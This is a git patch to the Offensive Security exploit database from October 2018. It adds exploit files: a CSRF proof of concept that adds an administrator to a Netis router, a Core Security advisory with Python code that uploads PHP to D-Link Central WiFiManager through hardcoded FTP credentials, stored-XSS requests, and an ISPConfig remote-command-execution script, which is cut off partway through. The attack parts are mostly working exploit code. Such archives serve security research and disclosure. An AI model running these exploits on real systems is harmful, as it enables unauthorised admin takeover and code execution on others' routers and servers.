From 21717894fe9fd50f761ad935b171589bda708bbb Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 6 Oct 2018 05:01:59 +0000 Subject: [PATCH] DB: 2018-10-06 4 changes to exploits/shellcodes Foxit Reader 9.0.1.1049 - Buffer Overflow (ASLR)(DEP) Foxit Reader 9.0.1.1049 - Buffer Overflow (ASLR & DEP Bypass) NICO-FTP 3.0.1.19 - Buffer Overflow (SEH)(ASLR) NICO-FTP 3.0.1.19 - Buffer Overflow (SEH) (ASLR Bypass) Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Request Forgery (Add Admin) D-Link Central WiFiManager Software Controller 1.03 - Multiple Vulnerabilities ISPConfig < 3.1.13 - Remote Command Execution Chamilo LMS 1.11.8 - Cross-Site Scripting Linux/x86 - execve(/bin/sh) + ROT-N + Shift-N + XOR-N Encoded Shellcode (77 bytes) Linux/x86 - execve(/bin/sh) + ROT-N/Shift-N/XOR-N Encoded Shellcode (77 bytes) Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes) Linux/x86 - execve(/bin/sh) + ROT-13/RShift-2/XOR Encoded Shellcode (44 bytes) Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (50 byes) Linux/x86 - execve(/bin/sh) + NOT/SHIFT-N/XOR-N Encoded Shellcode (50 byes) --- exploits/hardware/webapps/45532.txt | 42 ++++ exploits/php/webapps/45533.txt | 315 ++++++++++++++++++++++++++++ exploits/php/webapps/45534.py | 143 +++++++++++++ exploits/php/webapps/45535.txt | 27 +++ files_exploits.csv | 8 +- files_shellcodes.csv | 6 +- 6 files changed, 536 insertions(+), 5 deletions(-) create mode 100644 exploits/hardware/webapps/45532.txt create mode 100644 exploits/php/webapps/45533.txt create mode 100755 exploits/php/webapps/45534.py create mode 100644 exploits/php/webapps/45535.txt diff --git a/exploits/hardware/webapps/45532.txt b/exploits/hardware/webapps/45532.txt new file mode 100644 index 000000000..6a8bb75f0 --- /dev/null +++ b/exploits/hardware/webapps/45532.txt @@ -0,0 +1,42 @@ +# Exploit Title: Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Request Forgery (Add Admin) +# Author: Cakes +# Discovery Date: 2018-10-01 +# Vendor Homepage: http://www.netis-systems.com +# Software Link: http://www.netis-systems.com/Home/detail/id/74.html +# Tested Version: RTK 2.1.1 +# Tested on OS: Kali Linux +# CVE: N/A + +# Description +# Due to improper session management an attacker is able to add a administrator account +# without providing any authentication credentials. + +# PoC 1 +POST /form2userconfig.cgi HTTP/1.1 +Host: Target +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 112 + +username=Cakes&privilege=2&newpass=1234&confpass=1234&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send + +# PoC 2 + + +
+ + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45533.txt b/exploits/php/webapps/45533.txt new file mode 100644 index 000000000..c8021a4fc --- /dev/null +++ b/exploits/php/webapps/45533.txt @@ -0,0 +1,315 @@ +Core Security - Corelabs Advisory +http://corelabs.coresecurity.com/ + +D-Link Central WiFiManager Software Controller Multiple Vulnerabilities + +1. *Advisory Information* + +Title: D-Link Central WiFiManager Software Controller Multiple +Vulnerabilities +Advisory ID: CORE-2018-0010 +Advisory URL: http://www.coresecurity.com/advisories/d-link-central-wifimanager-software-controller-multiple-vulnerabilities +Date published: 2018-10-04 +Date of last update: 2018-10-04 +Vendors contacted: D-Link +Release mode: Coordinated release + +2. *Vulnerability Information* + +Class: Unrestricted Upload of File with Dangerous Type [CWE-434], +Improper Authorization [CWE-285], Improper Neutralization of Input +During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper +Neutralization of Input During Web Page Generation +('Cross-site Scripting') [CWE-79] +Impact: Code execution +Remotely Exploitable: Yes +Locally Exploitable: Yes +CVE Name: CVE-2018-17440, CVE-2018-17442, CVE-2018-17443, CVE-2018-17441 + +3. *Vulnerability Description* + +D-Link's website states that: + +[1] Central WiFiManager Software Controller helps network administrators +streamline their wireless access point (AP) management workflow. Central +WiFiManager is an innovative approach to the more traditional +hardware-based multiple access point management system. It uses a +centralized server to both remotely manage and monitor wireless APs on a +network. + +Vulnerabilities were found in the Central WiFiManager Software +Controller, allowing unauthenticated and authenticated file upload with +dangerous type that could lead to remote code execution with system +permissions. Also, two stored Cross Site Scripting vulnerabilities were +found. + +4. *Vulnerable Packages* + + . Central WifiManager v1.03 + +Other products and versions might be affected, but they were not tested. + +5. *Vendor Information, Solutions and Workarounds* + +D-Link released the following Beta version that addresses the reported vulnerabilities: + + . Central WifiManager v 1.03r0100-Beta1 + +In addition, D-Link published a security note in: +https://securityadvisories.dlink.com/announcement/publication.aspx?name=SAP10092 + +6. *Credits* + +These vulnerabilities were discovered and researched by Julian Muñoz +from Core Security Consulting Services. The publication of this advisory +was coordinated by Leandro Cuozzo from Core Advisories Team. + +7. *Technical Description / Proof of Concept Code* + +D-Link Central WiFiManager Software Controller exposes an FTP server +that serves by default in port 9000 and has hardcoded credentials +(admin, admin). Taking advantage of this fact, we will upload a PHP file +in the '/web/public' directory and then, by requesting this file, will +be able to execute arbitrary code on the target system (shown in 7.1). + +On 7.2 we show a similar attack to but in this case with an +authenticated user in the web application. The application has a +functionality to upload a .rar file used for the captive portal +displayed by the Access Points. We will craft a .rar with a PHP file +that we will end up executing in the context of the web application. +When the .rar is uploaded is stored in the path "\web\captivalportal" in +a folder with a timestamp created by the PHP time() function. In order +to know what is the web server's time we request an information file +that contains the time we are looking for. After we have the server's +time we upload the .rar, calculate the proper epoch and request the +appropriate path increasing this epoch by one until we hit the correct +one. + +Finally, we discovered two Cross-Site Scripting, one on the update site +functionality, in the 'sitename' parameter (7.3) and the other one on +the creation of a local user in the 'username' parameter (7.4). + +7.1. *Unauthenticated Remote Code Execution by Unrestricted Upload of +File with Dangerous Type* + +[CVE-2018-17440] The web application starts an FTP server running on the +port 9000 by default with admin/admin credentials and do not show the +option to change it, so in this POC we establish a connection with the +server and upload a PHP file. Since the application do not restrict +unauthenticated users to request any file in the web root, we later +request the uploaded file to achieve remote code execution. + +/----- +import requests +from ftplib import FTP + +#stablish connection with FTP server +host_ip = "127.0.0.1" +ftp = FTP() +ftp.connect(host=host_ip, port=9000) +ftp.login("admin", "admin") +data = [] + +#create PHP poc file +poc_php_file = open("poc.php", "w+") +poc_php_file.write("") +poc_php_file.close() + +#upload PHP poc file +php_file = open("poc.php", "rb") +ftp.cwd('/web/public') +ftp.storbinary("STOR write_file.php", php_file) +ftp.dir(data.append) +ftp.quit() + +for line in data: + print "-", line + +session = requests.Session() +session.trust_env = False + +#get the uploaded file for remote code execution +get_uploaded_file = session.get('https://127.0.0.1/public/write_file.php', verify=False) + +print get_uploaded_file.text +-----/ + +7.2. *Authenticated Remote Code Execution by Unrestricted Upload of File with Dangerous Type* + +[CVE-2018-17442] In this case we make a file upload using the +functionality given by the onUploadLogPic endpoint, that will take a +.rar file, decompress it and store it in a folder named after the PHP +time() function. Our goal is first obtain the server's time, upload a +.rar with our PHP file, calculate the proper epoch and iterate +increasing it until we hit the proper one and remote code execution is +achieved. + +/----- +import re +import time +import requests +import datetime +import tarfile + +def parse_to_datetime(date_string): + date_list = date_string.split("-") + td = date_list[2][2:].split(":") + return datetime.datetime(int(date_list[0]), int(date_list[1]), int(date_list[2][:2]),int(td[0]), int(td[1]), int(td[2])) + +session = requests.Session() +session.trust_env = False +php_session_id = "96sml0e9soke02k6d672oumqq4" #example (insert here the proper session id) +cookie = {'PHPSESSID': php_session_id} + +#create tar file to upload. +poc_php_file = open("poc.php", "w+") +poc_php_file.write("") +poc_php_file.close() + +poc_tar_file = tarfile.open("poc_tar_file.tar", mode="w") +poc_tar_file.add("poc.php") +poc_tar_file.close() + +#get server datetime. +get_server_time_from_requested_file = session.get('https://127.0.0.1/index.php/ReportSecurity/ExportAP/type/TXT', + cookies=cookie, verify=False) +date = re.search("Date(.*)\d", get_server_time_from_requested_file.text).group().replace('DateTime ', '') +#generate epoch from server's date +epoch = int(time.mktime(parse_to_datetime(date).timetuple())) + +#upload attack PHP file. +attack_tar_file = "poc_tar_file.tar" +tar_file = {'stylename': 'attack', 'logfile': open(attack_tar_file, 'rb')} +restore_backup_response = session.post('https://127.0.0.1/index.php/Config/onUploadLogPic', + files=tar_file, + cookies=cookie, verify=False) + +for i in range(0,20): + #get the uploaded file named after time epoch, returned by PHP time() function. + filename = str(epoch) + "/" + "poc.php" + get_uploaded_file = session.get('https://127.0.0.1/captivalportal/%s' %filename, verify=False) + if get_uploaded_file.status_code == 200: + print "Remote Code Execution Achived" + print get_uploaded_file.text + break + epoch += 1 +-----/ + +7.3. *Cross-Site Scripting in the application site name parameter* + +[CVE-2018-17443] The 'sitename' parameter of the UpdateSite endpoint is +vulnerable to a stored Cross Site Scripting: + +The following is a proof of concept to demonstrate the vulnerability: + +/----- +POST /index.php/Config/UpdateSite HTTP/1.1 +Host: 10.2.45.220 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 +Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://10.2.45.220/index.php/Config/CreatSite +Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US; +PHPSESSID=4fvbnmn343424rg8m1jg3qbc05 +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 66 + +siteid=0&sitename=&sitenamehid=fakesitename&UserMember%5B%5D=1 +-----/ + +7.4. *Cross-Site Scripting in the creation of a new user* + +[CVE-2018-17441] The 'username' parameter of the addUser endpoint is +vulnerable to a stored Cross Site Scripting. + +The following is a proof of concept to demonstrate the vulnerability: + +/----- +POST /index.php/System/addUser HTTP/1.1 +Host: 10.2.45.220 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 +Firefox/52.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://10.2.45.220/index.php/System/userManager +Content-Type: application/x-www-form-urlencoded; +Content-Length: 96 +Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US; +PHPSESSID=4fvbnmn343424rg8m1jg3qbc05 +Connection: close + +username=&userpassword=fakepassword&level=1&email=&remark=&userid=0&creator=1&mandatory=change& +-----/ + +8. *Report Timeline* + +2018-06-04: Core Security sent an initial notification to D-Link, +including a draft advisory. +2018-06-06:D-Link confirmed the reception of the advisory and informed +they will have an initial response on 06/08. +2018-06-08: D-Link informed that they would provide a schedule for the +fixes on 06/13. +2018-06-08: Core Security thanked the update. +2018-06-14: D-Link informed its plan of remediation and notified Core +Security that the fixed version will be available on 08/31. +2018-06-15: Core Security thanked the update and proposed to keep in +regular contact until this tentative release date. +2018-07-23: Core Security requested a status update. +2018-07-25: D-Link answered saying that they are still targeting 08/31 +as the release date. +2018-08-24: Core Security requested a new status update and a solidified +release date for the fixed version. +2018-08-28: D-Link sent a beta version for test. +2018-08-30: Core Security tested the beta version and requested D-Link +to coordinate a release date. +2018-09-21: D-Link informed that they were planning a security +announcement and they were ready to schedule a disclosure date. +2018-09-24: Core Security thanked the update and proposed October 4th as +the publication date. +2018-10-04: Advisory CORE-2018-0010 published. + +9. *References* + +[1] http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/. + +10. *About CoreLabs* + +CoreLabs, the research center of Core Security, is charged with +anticipating the future needs and requirements for information security +technologies. We conduct our research in several important areas of +computer security including system vulnerabilities, cyber attack +planning and simulation, source code auditing, and cryptography. Our +results include problem formalization, identification of +vulnerabilities, novel solutions and prototypes for new technologies. +CoreLabs regularly publishes security advisories, technical papers, +project information and shared software tools for public use at: +http://corelabs.coresecurity.com. + +11. *About Core Security* + +Core Security provides companies with the security insight they need to +know who, how, and what is vulnerable in their organization. The +company's threat-aware, identity & access, network security, and +vulnerability management solutions provide actionable insight and +context needed to manage security risks across the enterprise. This +shared insight gives customers a comprehensive view of their security +posture to make better security remediation decisions. Better insight +allows organizations to prioritize their efforts to protect critical +assets, take action sooner to mitigate access risk, and react faster if +a breach does occur. + +Core Security is headquartered in the USA with offices and operations in +South America, Europe, Middle East and Asia. To learn more, contact Core +Security at (678) 304-4500 or info@coresecurity.com + +12. *Disclaimer* + +The contents of this advisory are copyright (c) 2018 Core Security and +(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution +Non-Commercial Share-Alike 3.0 (United States) License: +http://creativecommons.org/licenses/by-nc-sa/3.0/us/ \ No newline at end of file diff --git a/exploits/php/webapps/45534.py b/exploits/php/webapps/45534.py new file mode 100755 index 000000000..2d36e939c --- /dev/null +++ b/exploits/php/webapps/45534.py @@ -0,0 +1,143 @@ +# Title: ISPConfig < 3.1.13 - Remote Command Execution +# Author: 0x09AL +# Date: 20/08/2018 +# Vendor: https://www.ispconfig.org/ +# +# Vulnerability Description +# +# There is an include on almost all the php files, which includes the language template. +# For example: + +# In password_reset.php - Line 46 the following code tries to include the filename +# that is specified in the $_SESSION['s']['language'] variable. +# +# include ISPC_ROOT_PATH.'/web/login/lib/lang/'.$_SESSION['s']['language'].'.lng'; +# +# Searching a little bit where the $_SESSION['s']['language'] variable is set we can find a reference in user_settings.php +# if(preg_match('/[a-z]{2}/',$_POST['language'])) { +# $_SESSION['s']['user']['language'] = $_POST['language']; +# $_SESSION['s']['language'] = $_POST['language']; +# } else { +# $app->error('Invalid language.'); +# } +# +# The regex checks if the language contains two lower-case characters. +# The problem is that everything that contains two [a-z] characters will match the regex. +# Developer probably missed the ^ $ on the regex to match the entire file. +# +# Since in the new versions of php we can not use null byte injections, either a path-truncation attack +# we can create a ftp-account, upload the file we want to include with .lng extension at our path and the code +# will get executed as the ispconfig account and not as our chroot-ed account. +# +# This exploit can be triggered by having clients credentias , and exploiting this vulnerability we can compromise +# the entire clients. +# +# You need to specify the hostname:port , username, and password of the client. + +import requests +import ftplib +import json +import time +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +host = "host:8080" +username = "username" +password = "password" + +exp = requests.session() +user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0' +ftp_username = "randomusr1" +domain = "pwned.com" +site_id = 1 +payload_name = "pwned1" +path = "" + + + +def login(): + r = exp.post('https://%s/login/index.php' % host,data={'username':username,'password':password,'s_mod':'login','s_pg':'index'},verify=False) + if(r.text.find("wrong")>0): + print "[-] Incorrect credentials [-]" + else: + print "[+] Logged in Succesfully [+]" + + +def createSite(): + + r = exp.get('https://%s/sites/web_vhost_domain_edit.php' % host,verify=False) + _csrf_key = r.text.split('name="_csrf_key" value="')[1].split('"')[0] + _csrf_id = r.text.split('name="_csrf_id" value="')[1].split('"')[0] + phpsessid = r.text.split('name="phpsessid" value="')[1].split('"')[0] + r = exp.post('https://%s/sites/web_vhost_domain_edit.php' % host,data={'server_id':1,'ip_address':'*','ipv6_address':'','domain':'%s' % domain,'hd_quota':1024,'traffic_quota':1024,'subdomain':'www','php':'no','fastcgi_php_version':'','active':'y','id':'','_csrf_id':'%s' % _csrf_id,'_csrf_key':'%s' % _csrf_key,'next_tab':'','phpsessid':'%s' % phpsessid},verify=False) + pass + +def createFtp(): + global site_id + r = exp.get('https://%s/sites/ftp_user_edit.php' % host,verify=False) + print "[+] Getting IDSof the sites [+]" + temp_array = r.text.split('